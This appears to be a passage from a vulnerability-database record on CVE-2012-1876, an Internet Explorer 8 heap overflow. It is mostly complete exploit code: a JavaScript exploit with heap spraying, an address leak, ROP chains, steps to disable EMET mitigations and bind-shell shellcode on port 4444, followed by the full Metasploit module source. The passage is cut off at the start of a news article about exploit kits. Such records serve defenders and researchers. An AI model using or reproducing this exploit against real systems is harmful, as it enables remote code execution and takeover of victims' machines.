unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp\n // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "edition": 1, "published": "2014-11-17T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-11-17T00:00:00", "id": "EXPLOITPACK:87ECAF4F1FACB468F006F877AE38824E", "href": "", "sourceData": "<!--\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass\n** Exploit Coded by sickness || EMET 5.1 bypass by ryujin\n** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4444\");\n while (shellcode.length < 100)\n shellcode = shellcode + shellcode;\n var shellcode = shellcode.substr(0, 46);\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01 annihilate ROP protections\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument) \n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\" \n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue \n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) \n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread \n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV EAX,DWORD PTR DS:[007D25F48H]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1312272\"; // 0x07D25E40\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:02:58", "description": "This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.\n", "published": "2012-07-31T21:14:29", "type": "metasploit", "title": "MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS12_037_IE_COLSPAN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :ua_minver => \"8.0\",\n # :ua_maxver => \"8.0\",\n # :rank => NormalRanking, # reliable memory corruption\n # :javascript => true\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\n 'Description' => %q{\n This module exploits a heap overflow vulnerability in Internet Explorer caused\n by an incorrect handling of the span attribute for col elements from a fixed table,\n when they are modified dynamically by javascript code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alexandre Pelletier', # Vulnerability analysis\n 'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\n 'binjo', # Metasploit module\n 'sinn3r', # Help with the Metasploit module\n 'juan vazquez' # Help with the Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-1876' ],\n [ 'OSVDB', '82866'],\n [ 'BID', '53848' ],\n [ 'MSB', 'MS12-037' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3 with msvcrt ROP',\n {\n 'Rop' => :msvcrt\n }\n ],\n [ 'IE 8 on Windows 7 SP1',\n {\n 'Rop' => :jre\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-06-12',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\n return targets[1] #IE 8 on Windows XP SP3\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\n return targets[2] #IE 8 on Windows 7 with JRE\n else\n return nil\n end\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def nop\n return make_nops(4).unpack(\"V\").first\n end\n\n def get_payload(t)\n\n code = payload.encoded\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :msvcrt\n print_status(\"Using msvcrt ROP\")\n exec_size = code.length\n rop =\n [\n 0x77c4ec01, # retn\n 0x77c4ec00, # pop ebp; retn\n 0x77c15ed5, # xchg eax,esp; retn (pivot)\n 0x77c4e392, # pop eax; retn\n 0x77c11120, # <- *&VirtualProtect()\n 0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\n junk,\n 0x77c2dd6c,\n 0x77c4ec00, # pop ebp; retn\n 0x77c35459, # ptr to 'push esp; ret'\n 0x77c47705, # pop ebx; retn\n exec_size, # ebx\n 0x77c3ea01, # pop ecx; retn\n 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\n 0x77c46100, # pop edi; retn\n 0x77c46101, # rop nop (-> edi)\n 0x77c4d680, # pop edx; retn\n 0x00000040, # newProtect (0x40) (-> edx)\n 0x77c4e392, # pop eax; retn\n nop, # nops (-> eax)\n 0x77c12df9 # pushad; retn\n ].pack(\"V*\")\n when :jre\n print_status(\"Using JRE ROP\")\n exec_size = code.length\n rop =\n [\n 0x7c346c0b, # retn\n 0x7c36f970, # pop ebp; retn\n 0x7c348b05, # xchg eax,esp; retn (pivot)\n 0x7c36f970, # pop ebp; retn [MSVCR71.dll]\n 0x7c36f970, # skip 4 bytes [MSVCR71.dll]\n 0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\n exec_size, # ebx\n 0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\n 0x00000040, # 0x00000040-> edx\n 0x7c361829, # pop ecx ; retn [MSVCR71.dll]\n 0x7c38f036, # &Writable location [MSVCR71.dll]\n 0x7c342766, # pop edi ; retn [MSVCR71.dll]\n 0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\n 0x7c350564, # pop esi ; retn [MSVCR71.dll]\n 0x7c3415a2, # jmp [eax] [MSVCR71.dll]\n 0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\n 0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\n 0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\n 0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\n ].pack(\"V*\")\n end\n\n code = rop + code\n return code\n end\n\n def on_request_uri(cli, request)\n\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported: #{agent}\")\n send_not_found(cli)\n return\n end\n\n js_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\n\n table_builder = ''\n\n 0.upto(132) do |i|\n table_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >  </col></table>\"\n end\n\n # About smash_vtable():\n # * smash the vftable 0x07070024\n # * span => the amount to overwrite\n js_element_id = Rex::Text.rand_text_alpha(4)\n spray_trigger_js = <<-JS\n\n var dap = \"EEEE\";\n while ( dap.length < 480 ) dap += dap;\n\n var padding = \"AAAA\";\n while ( padding.length < 480 ) padding += padding;\n\n var filler = \"BBBB\";\n while ( filler.length < 480 ) filler += filler;\n\n var arr = new Array();\n var rra = new Array();\n\n var div_container = document.getElementById(\"#{js_element_id}\");\n div_container.style.cssText = \"display:none\";\n\n for (var i=0; i < 500; i+=2) {\n rra[i] = dap.substring(0, (0x100-6)/2);\n arr[i] = padding.substring(0, (0x100-6)/2);\n arr[i+1] = filler.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n }\n\n for (var i=200; i<500; i+=2 ) {\n rra[i] = null;\n CollectGarbage();\n }\n\n function heap_spray(){\n CollectGarbage();\n\n var shellcode = unescape(\"#{js_code}\");\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n var onemeg = shellcode.substr(0, 64*1024/2);\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n var spray = new Array();\n\n for (i=0; i<400; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n }\n\n function smash_vtable(){\n var obj_col_0 = document.getElementById(\"132\");\n obj_col_0.width = \"1178993\";\n obj_col_0.span = \"44\";\n }\n\n setTimeout(function(){heap_spray()}, 400);\n setTimeout(function(){smash_vtable()}, 700);\n JS\n\n if datastore['OBFUSCATE']\n spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\n spray_trigger_js.obfuscate(memory_sensitive: true)\n end\n\n # build html\n content = <<-HTML\n <html>\n <body>\n <div id=\"#{js_element_id}\"></div>\n #{table_builder}\n <script language='javascript'>\n #{spray_trigger_js}\n </script>\n </body>\n </html>\n HTML\n\n print_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms12_037_ie_colspan.rb"}], "threatpost": [{"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2012-0755", "CVE-2012-1876", "CVE-2012-5067", "CVE-2013-0634"], "description": "You cannot accuse the keepers of the Cool Exploit Kit of not recognizing market trends. Given a rash of recent watering hole attacks and zero-day exploits built around Microsoft\u2019s Internet Explorer browser, it\u2019s no surprise that a 15-month-old IE exploit has been included in the crimeware package.\n\nMicrosoft 